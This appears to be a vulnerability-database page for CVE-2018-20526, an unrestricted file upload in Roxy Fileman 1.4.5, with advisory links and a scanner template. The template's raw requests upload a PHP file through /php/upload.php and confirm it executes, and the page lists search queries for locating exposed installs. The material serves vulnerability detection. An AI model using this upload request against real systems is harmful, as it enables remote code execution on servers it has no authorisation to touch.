| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| Roxy Fileman 1.4.5 - Unrestricted File Upload / Directory Traversal Vulnerability | 7 Jan 201900:00 | – | zdt | |
| Roxy Fileman File Upload Vulnerability | 9 Jan 201900:00 | – | cnvd | |
| CVE-2018-20526 | 18 Mar 201915:25 | – | cve | |
| CVE-2018-20526 | 18 Mar 201915:25 | – | cvelist | |
| Roxy Fileman 1.4.5 - Unrestricted File Upload / Directory Traversal | 7 Jan 201900:00 | – | exploitdb | |
| Roxy Fileman 1.4.5 - Unrestricted File Upload Directory Traversal | 7 Jan 201900:00 | – | exploitpack | |
| CVE-2018-20526 | 21 Mar 201916:00 | – | nvd | |
| CVE-2018-20526 | 21 Mar 201916:00 | – | osv | |
| Roxy Fileman 1.4.5 File Upload / Directory Traversal | 7 Jan 201900:00 | – | packetstorm | |
| Unrestricted file upload | 21 Mar 201916:00 | – | prion |
id: CVE-2018-20526
info:
name: Roxy Fileman 1.4.5 - Unrestricted File Upload
author: DhiyaneshDK
severity: critical
description: |
Roxy Fileman 1.4.5 is susceptible to unrestricted file upload via upload.php. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
impact: |
Successful exploitation of this vulnerability can result in remote code execution, allowing an attacker to execute arbitrary commands on the target system.
remediation: |
Upgrade to a patched version of Roxy Fileman or apply the necessary security patches to prevent unrestricted file uploads.
reference:
- http://packetstormsecurity.com/files/151033/Roxy-Fileman-1.4.5-File-Upload-Directory-Traversal.html
- https://www.exploit-db.com/exploits/46085/
- https://nvd.nist.gov/vuln/detail/CVE-2018-20526
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-20526
cwe-id: CWE-434
epss-score: 0.73056
epss-percentile: 0.9939
cpe: cpe:2.3:a:roxyfileman:roxy_fileman:1.4.5:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: roxyfileman
product: roxy_fileman
shodan-query: http.title:"roxy file manager"
fofa-query: title="roxy file manager"
google-query:
- intitle:"Roxy file manager"
- intitle:"roxy file manager"
tags: cve,cve2018,roxy,fileman,rce,fileupload,intrusive,packetstorm,edb,roxyfileman,vkev,vuln
http:
- raw:
- |
POST /php/upload.php HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary20kgW2hEKYaeF5iP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36
Origin: {{BaseURL}}
Referer: {{BaseURL}}
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
------WebKitFormBoundary20kgW2hEKYaeF5iP
Content-Disposition: form-data; name="action"
upload
------WebKitFormBoundary20kgW2hEKYaeF5iP
Content-Disposition: form-data; name="method"
ajax
------WebKitFormBoundary20kgW2hEKYaeF5iP
Content-Disposition: form-data; name="d"
/Uploads
------WebKitFormBoundary20kgW2hEKYaeF5iP
Content-Disposition: form-data; name="files[]"; filename="{{randstr}}.php7"
Content-Type: application/octet-stream
<?php
echo md5('CVE-2018-20526');
?>
------WebKitFormBoundary20kgW2hEKYaeF5iP--
- |
GET /Uploads/{{randstr}}.php7 HTTP/1.1
Host: {{Hostname}}
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "f76d6a5f7491700cc3a678bdba2902d3"
- type: status
status:
- 200
# digest: 490a00463044022015a92603b65b2285b32c50424d35143742428bb1d4f45628051e618320a78d0c02201bf2a2e111e0a81e023ceb489998135c5af396734052905824e562c67956bad0:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation